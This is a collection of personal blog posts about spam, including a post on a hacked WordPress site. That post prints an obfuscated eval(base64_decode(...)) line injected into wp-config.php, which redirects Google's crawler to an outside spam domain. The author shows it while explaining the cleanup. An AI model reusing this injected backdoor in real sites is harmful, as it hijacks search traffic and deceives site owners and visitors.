Tag: Spam

“Since you are a person I trust, I wanted to invite you to join my network on LinkedIn” – Is this a new form of spam?

LinkedIn Spam Connection Request
LinkedIn Spam Connection Request?

In the last three days I have received 3 invitations to connect with total strangers on LinkedIn – in and of itself, that’s not all that unusual. I often receive invitations from strangers to connect on LinkedIn – most I quietly ignore.

What made these invitations different was the fact that they were all worded identically – they all said:

Since you are a person I trust, I wanted to invite you to join my network on LinkedIn.

This wouldn’t be all that unusual if that were the default text provided by LinkedIn when you request to connect to someone, but it is not. When you normally try to connect with someone on LinkedIn, it sends the text

I’d like to add you to my professional network on LinkedIn

Official LinkedIn connection request
Official LinkedIn connection request

Maybe LinkedIn are trialling the new wording and only certain people get it when they try to connect with people.

Maybe, it is being trialled only in certain regions.

Maybe you get this wording when you chose a different type of connection request.

Or, and I suspect this is the case, this is a new type of spambot trying to gain connections on LinkedIn.

None of the three accounts had more than 7 connections. None had filled out their profiles and none had any shared connections with me.

I guess there is a chance that this is default text, for new accounts only, on LinkedIn.

However, I have to think it is spam – be warned and don’t connect to anyone whose invite has this wording

Since you are a person I trust, I wanted to invite you to join my network on LinkedIn

unless you know them extremely well and even then, confirm with an email before accepting, just to be sure.

Blog still hacked?

I mentioned here the other day that this blog was hacked and I thought I had resolved it – now I’m not so sure.

The hack is a tricky one because the spam it is displaying is only visible in Google Reader! (and not in any other RSS reader).

I have completely deleted all the WordPress files, including themes and plug-ins, and uploaded fresh copies of them. I have hardened the file permissions run scans and a few other recommended steps but when I log in to Google Reader I still see new spam posts. This is very disheartening.

I’m hoping that the situation is, in fact, resolved and that Google Reader simply hasn’t updated its cache. The hack also did a 302 re-direct on the feed, so perhaps Google needs to refresh its DNS, I’m not sure, nor am I sure hoow often they perform this.

So for now, I’m in a holding position. I won’t make any more changes and I’ll see if the spam continues.

Stay tuned!!!

Blog hacked? UPDATED

This blog appears to have been hacked somehow.

This is my old blog and apart from a test posting the other day, I hadn’t added any new posts since May 2009.

Blog posts

However, when you view this blog’s feed in Google Reader it appears to be full of spammy posts.

Spammy posts in Google Reader

The spammy posts don’t show up when viewing the blog’s feed in Firefox (or Safari) RSS readers – it seems to be confined to Google Reader somehow.

Feed seen in Firefox

I also checked the backend mysql database and the spammy posts are not there so I’m not sure where they are coming from.

I was using the FeedBurner Feedsmith plugin for handling this blog’s feeds but I deactivated that over the weekend when I first became aware of this issue. I thought perhaps the FeedBurner feed may have been hacked so that if I turned it off, any cached spam posts would be cleared out after a day or so, however it seems to not only have persisted but more posts have been added.

Anyone any idea how this is happening and what I can do to stop it?

UPDATE –

With help from Ewan – I discovered that (after looking around at a lot of other files) the wp-config.php file had been edited. The following line had been added

eval(base64_decode('JGFnZW50PSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTtpZihlcmV
naSgiZ29vZ2xlIiwgJGFnZW50KSl7aGVhZGVyKCJIVFRQLzEuMSAzMDEiKTtoZWFkZXIoIkxv
Y2F0aW9uOiBodHRwOi8vYmFibG8ubWUudWsvIik7ZXhpdCgpO30='));

To be safe, I FTP’d in to the server, deleted the wp-config.php file and uploaded a clean one.

The site is now back to working as expected, apologies to anyone who was exposed to the spammy links.

I’ll now go back over the site again with the proverbial fine-toothed comb to see if I can find any other suspicious changes that were made to it.

Funny FaceBook spam!

Ironic FaceBook Spam

I received this FaceBook invite to a webinar from Chris Abraham of AbrahamHarrison and Jay Jaffe of Jaffe Associates.

This invite was sent to over 2,200 people on FaceBook. Seems like kind of spammy behaviour to me!

Ironically the webinar is on “how to look after your online reputation and why it is important to do so”.

I guess they did this for the “What NOT to do” part of the webinar!

I suppose I received the invite because I chose to accept a Friend request from Chris Abraham back in 2007. This is not the first invite I have received from Chris since then (far from it). The dangers not being selective enough with who you friend on FaceBook, eh?

Dear FaceBook, please put an UnFriend link on invites like this so that with a single click I can insure I don’t receive any more,

Thanks,

Tom.

Spam Assassin on Direct Admin problem

As I mentioned previously, I have rolled out a new server for my blog (and a couple of sites I host) in the last few days. I am now being hammered by spam! Spam Assassin is installed on the server.

The hosting software on the server is called Direct Admin and in each hosted domain in Direct Admin I have set Spam Assassin to 5.0 (which I thought would be low enough to catch most spam).

I also configured it to allow all spam through but labelled as ***SPAM***.

I haven’t received a single email labelled as ***SPAM*** but I have received lots of spam. 🙁

Spam Assassin setup

There’s obviously something simple missing in the config of SA on the server.

I know it is probably an impossible question to answer without more info but if anyone can think of something I might be missing, could you let me know?

UPDATE: A Direct Admin support staff member emailed me the fix – it is available at http://help.directadmin.com/item.php?id=36

Slow comments in WordPress

In the last couple of weeks commenting on this site was taking longer and longer – sometimes timing out and not letting people comment at all. I was puzzled as to the cause of this and tried turning off various of the plugins I had installed on this blog.

Today though I think I have found what the problem was! I looked into the Akismet anti-spam plugin and found that there were nearly 10,000 spam comments there! I deleted the nuisance comments and now commenting seems to be working much better.

Anyone still having problems commenting here?

Thinkhouse PR

Damien’s post on Thinkhouse PR appears to have been removed from the Google index.

If you do a Google search for the post, you can find a copy of it in Irishblogs.ie but not the original post on Damien’s blog. The post is still in MSN and Yahoo according to Damien. How bizarre!

The only explanation which makes any sense to me is that Google might have removed the post from their index if they received a legal letter from Thinkhouse PR (or perhaps some concerned web surfer acting in their interest).

I could be more direct in my assertions if the libel laws in this country weren’t so strict.

The text of Damien’s post was innocuous enough to my mind – he merely mentioned that he had complained them to the Data Protection Commissioner for repeatedly sending him unsolicited commercial emails (spam) despite being asked not to.

With Damien’s permission, here is the text of his banned post:

Hi everyone in Thinkhouse PR! As promised, here is my formal complaint to the Data Protection Commissioner for being repeatedly spammed by you on behalf of your clients. Just so you know I’ve also, as promised, contacted Three, Imagine and Ben and Jerry’s Ireland and asked them to investigate why I am getting spams about their products from you.

I’m writing to make a formal complaint against Thinkhouse PR for continually sending unsolicited emails to one of my email accounts despite being asked not to. The email account in question is info [at] irelandoffline.org a part-time non-commercial voluntary group.

Enclosed are 5 sets of documents. Thinkhouse contacted info@irelandoffline.org (which is shared with a colleague John Timmons) initially on behalf of their client Imagine who were releasing a new broadband product. We did not ask to be put on further email distributions for Imagine or for anyone else.

Despite this, on Fri August 4th Jane McDonald from Thinkhouse sent an email promoting an initiative from Ben and Jerry’s. (See document No. 2) Ben and Jerry’s are a client of Thinkhouse. My reply to this unsolicited email is at the end of the document.

Jane McDonald replied to this (see document No. 3) and gave the excuse that there was some kind of slip and my email address was put into a personal circular. I would not consider it was a personal mail. Jane seems to suggest that Thinkhouse are aware of spamming laws.

On August 18th Thinkhouse PR sent me another mail, a press release for the mobile phone operator “3�. (See document no. 4. This document is the back and forth communication between myself and Thinkhouse PR.) At the top of the document is a communication from Jane McDonald telling me once again I’m off everyone’s list after I again requested it. Jane also admits to using my email address without permission to add me to their mailing lists.

On August 22nd (see document No. 5) Andrea Horan from Thinkhouse PR again sent me a PR, this time for another of their clients. This one for Moviestar.ie.

I wish for the Data Protection Commissioner to investigate this and carry out a prosecution if needs be. I am willing to travel to Dublin, I am willing to make a written statement and I am willing to testify in Court if the need arises. Thinkhouse PR is contravening the Irish Spam Legislation and it is totally disregarding my repeated requests to stop being sent information. I have also asked for my contact details to be removed from their systems and this has been disregarded too.

Please contact me on receipt of this complaint. Contact details are above.
Regards,
Damien Mulley